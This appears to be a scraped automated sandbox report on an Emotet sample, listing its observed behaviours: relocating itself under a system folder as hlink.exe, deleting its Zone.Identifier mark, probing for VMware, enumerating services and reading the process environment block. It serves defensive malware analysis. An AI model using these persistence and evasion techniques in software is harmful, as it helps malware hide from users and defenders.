Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	PE file moved: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File opened: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File opened: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe:Zone.Identifier read attributes \| delete

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: ChangeServiceConfig2W,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap,

Source: C:\Windows\System32\svchost.exe TID: 6060	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6060	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0
Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03043A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03043A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose,

Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000004.00000002.504082116.000002DB0C660000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000001.00000002.491247141.000002652D602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: hlink.exe, 00000003.00000003.324534644.0000000002BB7000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.503963627.000002DB0C64B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000004.00000002.501259513.000002DB06E29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@Af
Source: svchost.exe, 00000007.00000002.501267426.000002705DC68000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.501064177.0000020DC6A29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000004.00000002.504082116.000002DB0C660000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000001.00000002.491247141.000002652D602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: hlink.exe, 00000003.00000003.324534644.0000000002BB7000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.503963627.000002DB0C64B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000004.00000002.501259513.000002DB06E29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@Af
Source: svchost.exe, 00000007.00000002.501267426.000002705DC68000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.501064177.0000020DC6A29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.292246563.0000019630140000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.502619598.000002705E790000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.311498734.0000020BEA140000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03045140 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03044190 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC6CDE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC0456 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC095E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5D2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03045140 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03044190 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC6CDE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC0456 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC095E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_02FC5D2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD4190 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00FD5140 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E16CDE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E10456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E1095E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00E15D2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\InputInjectionBroker\hlink.exe	Code function: 3_2_00F71030 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Users\user\Desktop\AXZFXiJCj3.exe	Code function: 0_2_03001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report AXZFXiJCj3

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion: